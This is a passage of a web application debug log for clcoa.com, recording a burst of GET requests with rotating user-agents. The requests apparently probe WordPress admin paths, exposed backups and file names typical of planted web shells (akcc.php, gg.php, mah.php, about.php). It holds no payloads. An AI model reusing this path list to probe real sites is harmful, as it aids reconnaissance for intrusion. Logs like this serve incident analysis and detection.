=> 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '179.191.137.249', 'x-real-ip' => '179.191.137.249', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:21+08:00 ] 254.243.87.154 GET /wp-includes/js/dist/development [ info ] clcoa.com/wp-includes/js/dist/development [运行时间:0.019958s][吞吐率:50.11req/s] [内存消耗:2,208.41kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000051s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001134s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-includes', 1 => 'js', 2 => 'dist', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.yahoo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '254.243.87.154', 'x-real-ip' => '254.243.87.154', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:21+08:00 ] 140.19.24.4 GET /wp-user.php [ info ] clcoa.com/wp-user.php [运行时间:0.020391s][吞吐率:49.04req/s] [内存消耗:2,208.52kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000048s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001349s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-user.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '140.19.24.4', 'x-real-ip' => '140.19.24.4', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:21+08:00 ] 106.103.208.128 GET /404.php [ info ] clcoa.com/404.php [运行时间:0.020474s][吞吐率:48.84req/s] [内存消耗:2,208.67kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001228s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '404.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '106.103.208.128', 'x-real-ip' => '106.103.208.128', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:21+08:00 ] 137.135.9.85 GET /akcc.php [ info ] clcoa.com/akcc.php [运行时间:0.019689s][吞吐率:50.79req/s] [内存消耗:2,208.66kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001119s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'akcc.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '137.135.9.85', 'x-real-ip' => '137.135.9.85', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:21+08:00 ] 248.214.244.176 GET /gg.php [ info ] clcoa.com/gg.php [运行时间:0.018914s][吞吐率:52.87req/s] [内存消耗:2,208.70kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001106s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'gg.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '248.214.244.176', 'x-real-ip' => '248.214.244.176', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:22+08:00 ] 84.132.228.91 GET /mah.php [ info ] clcoa.com/mah.php [运行时间:0.019576s][吞吐率:51.08req/s] [内存消耗:2,208.67kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001166s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'mah.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; SM-A525F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.yahoo.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '84.132.228.91', 'x-real-ip' => '84.132.228.91', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:22+08:00 ] 161.150.119.24 GET /new.php [ info ] clcoa.com/new.php [运行时间:0.019954s][吞吐率:50.12req/s] [内存消耗:2,208.63kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001201s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'new.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '161.150.119.24', 'x-real-ip' => '161.150.119.24', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:22+08:00 ] 171.253.99.27 GET /themes.php [ info ] clcoa.com/themes.php [运行时间:0.021234s][吞吐率:47.09req/s] [内存消耗:2,208.54kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001299s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'themes.php', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_7_9 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.5 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '171.253.99.27', 'x-real-ip' => '171.253.99.27', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:22+08:00 ] 147.70.26.175 GET /uploads/index.php [ info ] clcoa.com/uploads/index.php [运行时间:0.020300s][吞吐率:49.26req/s] [内存消耗:2,208.88kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001216s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'uploads', 1 => 'index.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; M2101K6G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '147.70.26.175', 'x-real-ip' => '147.70.26.175', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:23+08:00 ] 103.66.64.67 GET /wp-admin [ info ] clcoa.com/wp-admin [运行时间:0.018893s][吞吐率:52.93req/s] [内存消耗:2,208.64kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001097s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '103.66.64.67', 'x-real-ip' => '103.66.64.67', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:23+08:00 ] 246.59.61.100 GET /wp-admin/classwithtostring.php [ info ] clcoa.com/wp-admin/classwithtostring.php [运行时间:0.019807s][吞吐率:50.49req/s] [内存消耗:2,208.66kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001182s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'classwithtostring.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.g (Linux; Android 13; Pixel 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '246.59.61.100', 'x-real-ip' => '246.59.61.100', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:23+08:00 ] 137.145.18.13 GET /wp-admin/css [ info ] clcoa.com/wp-admin/css [运行时间:0.020835s][吞吐率:48.00req/s] [内存消耗:2,208.46kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000036s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001267s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'css', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 16_7_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '137.145.18.13', 'x-real-ip' => '137.145.18.13', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:23+08:00 ] 164.181.174.211 GET /wp-admin/css/about.php [ info ] clcoa.com/wp-admin/css/about.php [运行时间:0.021539s][吞吐率:46.43req/s] [内存消耗:2,208.95kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001162s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'css', 2 => 'about.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 11; 21081111RG) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '164.181.174.211', 'x-real-ip' => '164.181.174.211', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:23+08:00 ] 144.153.90.243 GET /wp-admin/includes/colour.php [ info ] clcoa.com/wp-admin/includes/colour.php [运行时间:0.024458s][吞吐率:40.89req/s] [内存消耗:2,208.57kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001418s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'includes', 2 => 'colour.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '144.153.90.243', 'x-real-ip' => '144.153.90.243', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:24+08:00 ] 31.247.141.142 GET /wp-admin/js [ info ] clcoa.com/wp-admin/js [运行时间:0.021803s][吞吐率:45.87req/s] [内存消耗:2,208.51kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001182s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'js', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPad; CPU OS 17_0_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '31.247.141.142', 'x-real-ip' => '31.247.141.142', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:24+08:00 ] 126.2.131.243 GET /wp-admin/js/autoload_classmap.php [ info ] clcoa.com/wp-admin/js/autoload_classmap.php [运行时间:0.022262s][吞吐率:44.92req/s] [内存消耗:2,208.45kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001211s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'js', 2 => 'autoload_classmap.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 12; V2134) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '126.2.131.243', 'x-real-ip' => '126.2.131.243', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:24+08:00 ] 155.91.24.197 GET /wp-admin/js/widgets [ info ] clcoa.com/wp-admin/js/widgets [运行时间:0.021912s][吞吐率:45.64req/s] [内存消耗:2,208.50kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000050s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001286s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-admin', 1 => 'js', 2 => 'widgets', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '155.91.24.197', 'x-real-ip' => '155.91.24.197', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:24+08:00 ] 12.252.88.204 GET /wp-content/autoload_classmap.php [ info ] clcoa.com/wp-content/autoload_classmap.php [运行时间:0.023172s][吞吐率:43.16req/s] [内存消耗:2,208.49kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001506s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'autoload_classmap.php', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', 'referer' => 'https://www.google.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '12.252.88.204', 'x-real-ip' => '12.252.88.204', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:24+08:00 ] 154.146.227.137 GET /wp-content/backups-dup-lite [ info ] clcoa.com/wp-content/backups-dup-lite [运行时间:0.020658s][吞吐率:48.41req/s] [内存消耗:2,208.65kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001283s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'backups-dup-lite', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-S908E) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.fr/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '154.146.227.137', 'x-real-ip' => '154.146.227.137', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:25+08:00 ] 46.36.235.216 GET /wp-content/languages [ info ] clcoa.com/wp-content/languages [运行时间:0.019811s][吞吐率:50.48req/s] [内存消耗:2,208.85kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001151s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'languages', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 13; SM-G991U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.co.uk/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '46.36.235.216', 'x-real-ip' => '46.36.235.216', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:25+08:00 ] 14.217.164.1 GET /wp-content/plugins/admin.php [ info ] clcoa.com/wp-content/plugins/admin.php [运行时间:0.019474s][吞吐率:51.35req/s] [内存消耗:2,208.69kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000046s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001161s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'plugins', 2 => 'admin.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.google.de/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '14.217.164.1', 'x-real-ip' => '14.217.164.1', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:25+08:00 ] 39.143.41.235 GET /wp-content/themes/admin.php [ info ] clcoa.com/wp-content/themes/admin.php [运行时间:0.019677s][吞吐率:50.82req/s] [内存消耗:2,208.73kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001157s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'themes', 2 => 'admin.php', ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '39.143.41.235', 'x-real-ip' => '39.143.41.235', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:25+08:00 ] 59.148.172.164 GET /wp-content/uploads [ info ] clcoa.com/wp-content/uploads [运行时间:0.018386s][吞吐率:54.39req/s] [内存消耗:2,208.82kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000037s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001100s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'wp-content', 1 => 'uploads', 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => 'clcoa.com', 'user-agent' => 'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Mobile Safari/537.36', 'referer' => 'https://www.bing.com/', 'accept' => 'text/html, application/xhtml+xml, application/xml; q=0.9, image/webp, */*; q=0.8', 'accept-language' => 'en-US, en; q=0.5', 'upgrade-insecure-requests' => '1', 'dnt' => '1', 'x-forwarded-for' => '59.148.172.164', 'x-real-ip' => '59.148.172.164', 'cookie' => 'PHPSESSID=devu6fjdikp5olsevg3p0ogls3', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2025-12-14T18:50:25+08:00 ] 223.169.90.182 GET /wp-content/uploads/2025 [ info ] clcoa.com/wp-content/uploads/2025 [运行时间:0.018424s][吞吐率:54.28req/s] [内存消耗:2,208.73kb] [文件加载:50] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000038s ] [ info ] [ 